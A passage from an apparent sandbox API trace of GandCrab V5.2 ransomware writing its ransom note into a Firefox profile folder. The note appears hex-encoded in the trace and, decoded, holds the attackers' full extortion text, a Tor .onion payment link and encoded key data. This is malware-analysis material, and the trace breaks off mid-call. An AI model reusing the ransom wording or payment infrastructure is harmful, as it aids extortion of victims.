VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.915] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\\\TITWMVJL-DECRYPT.txt") returned 132 [0080.915] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0080.919] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0080.919] WriteFile (in: hFile=0x2e4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e068, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e068*=0x2162, lpOverlapped=0x0) returned 1 [0080.922] CloseHandle (hObject=0x2e4) returned 1 [0080.923] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.923] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.923] GetSystemTime (in: lpSystemTime=0x25d0400 | out: 